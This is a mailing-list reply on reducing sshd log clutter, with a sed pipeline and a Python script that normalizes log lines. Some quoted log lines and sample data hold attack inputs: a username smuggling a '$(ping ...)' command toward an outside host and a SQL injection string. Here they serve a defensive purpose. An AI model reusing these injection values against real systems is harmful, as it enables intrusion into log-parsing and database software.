Minimize sshd log clutter/spam from unauthenticated connections

Keine Eile keine-eile at e-mail.de
Mon Mar 20 02:46:14 AEDT 2023


[...]

> journalctl -t sshd -o cat \
>      | grep -v '^Accepted ' \
>      | sed -E 's/[Uu]ser \S+/user .../' \
>      | sed -E 's/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/0.0.0.0/' \
>      | sed -E 's/port\s+[0-9]+/port 0/' \
>      | sed -E 's/".*"/"..."/' \
>      | sed -E 's/Change of username or service not allowed: .+/Change of username or service not allowed: .../' \
>      | sed -E 's/Their offer: .+/Their offer: .../' \
>      | sort -u
> 
> I found a select few attempts to mess with, identify, or exploit log parsing IDS/IPS software like fail2ban (and feel confirmed in my choice of an alternative solution with far less attack surface, see my other mail):
> 
> Invalid user $(ping -c 1 16e939dc.ad.xspzo.com) from ...
> Invalid user ' $(ping -c 1 16e939dc.ad.xspzo.com) from ...
> Invalid user ' or '1'='1' - from 176.100.42.41
[...]

May I suggest you take a look at logcheck(8)? It seems that this is what you are looking for.
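The quoted sed chain masks the username with `[Uu]ser \S+`, which stops at the first space, so usernames that themselves contain whitespace (as in the quoted lines) are only partially masked and still produce one unique line each. The following Python normalizer is an added example, not code from the thread or from OpenSSH: `normalize_sed` mirrors the quoted pipeline rule for rule, and `normalize_strict` anchors on the known `Invalid user <name> from <ip> port <n>` message shape so the whole username field is masked no matter what it contains. The sample log lines and host names are constructed for the example.

```python
"""Normalize sshd log lines so that only the distinct message shapes remain.

Added example (not from the mailing-list thread). Two normalizers are
compared: one that mirrors the quoted sed chain and one that anchors on
the full "Invalid user" message so usernames containing spaces cannot
leak through the mask.
"""
import re

# Rules in the same order as the quoted sed chain; sed without /g replaces
# only the first match per line, so count=1 is used below.
SED_RULES = [
    (re.compile(r"[Uu]ser \S+"), "user ..."),
    (re.compile(r"[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"), "0.0.0.0"),
    (re.compile(r"port\s+[0-9]+"), "port 0"),
    (re.compile(r'".*"'), '"..."'),
    (re.compile(r"Change of username or service not allowed: .+"),
     "Change of username or service not allowed: ..."),
    (re.compile(r"Their offer: .+"), "Their offer: ..."),
]

# Anchored shape of sshd's invalid-user message. The greedy (.*) backtracks
# to the last " from ", so a username containing " from " is still handled.
INVALID_USER = re.compile(
    r"^Invalid user (?P<user>.*) from (?P<ip>\S+)(?P<port> port \d+)?$")
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
PORT = re.compile(r"\bport \d+\b")


def normalize_sed(line):
    """Equivalent of the quoted pipeline; returns None for dropped lines."""
    if line.startswith("Accepted "):
        return None
    for pattern, replacement in SED_RULES:
        line = pattern.sub(replacement, line, count=1)
    return line


def normalize_strict(line):
    """Mask the entire username field of 'Invalid user' lines, then IPs/ports."""
    if line.startswith("Accepted "):
        return None
    m = INVALID_USER.match(line)
    if m:
        return "Invalid user ... from 0.0.0.0" + (" port 0" if m.group("port") else "")
    line = IPV4.sub("0.0.0.0", line)
    return PORT.sub("port 0", line)


def summarize(lines, normalizer):
    """Count occurrences of each normalized shape (the 'sort -u' step, with counts)."""
    counts = {}
    for raw in lines:
        shape = normalizer(raw.rstrip("\n"))
        if shape is not None:
            counts[shape] = counts.get(shape, 0) + 1
    return counts


# Constructed sample lines in sshd's log format (not real log data).
SAMPLE = [
    "Accepted publickey for alice from 198.51.100.7 port 50000 ssh2",
    "Invalid user admin from 203.0.113.9 port 50000",
    "Invalid user $(ping -c 1 host.example) from 10.0.0.5 port 4444",
    "Invalid user ' or '1'='1' - from 10.0.0.6 port 4445",
    "Connection closed by 198.51.100.7 port 33000 [preauth]",
]

if __name__ == "__main__":
    for name, fn in (("sed-style", normalize_sed), ("strict", normalize_strict)):
        print(f"== {name} ==")
        for shape, n in sorted(summarize(SAMPLE, fn).items()):
            print(f"{n:4d}  {shape}")
```

Run against the sample, the sed-style normalizer yields four distinct shapes because the two odd usernames survive the `\S+` mask, while the strict normalizer collapses all three invalid-user lines into one. Both versions only mask IPv4 addresses, exactly like the quoted chain; an IPv6 rule would have to be added for dual-stack hosts.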
